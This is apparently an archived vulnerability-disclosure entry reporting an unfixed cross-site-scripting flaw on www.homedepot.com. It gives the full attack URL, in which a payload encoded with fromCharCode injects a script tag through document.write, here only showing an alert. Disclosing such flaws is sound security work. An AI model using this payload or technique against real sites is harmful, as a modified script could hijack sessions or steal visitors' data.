Security researcher PaPPy, has submitted on 11/01/2009 a cross-site-scripting (XSS) vulnerability affecting www.homedepot.com, which at the time of submission ranked 754 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 15/10/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 11/01/2009 |
Date published: 15/10/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: PaPPy |
Domain: www.homedepot.com |
Category: XSS |
Pagerank: 754 |
URL: http://www.homedepot.com/webapp/wcs/stores/servlet/ContentView?storeId=10051&jspStoreDir=hdus&pn=SF_ OD_Charbroil_Red_Grill_'); %0A document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,59,60,47 ,115,99,114,105,112,116,62));%0Adocument.write('a |
Click here to view the mirror
|
|
|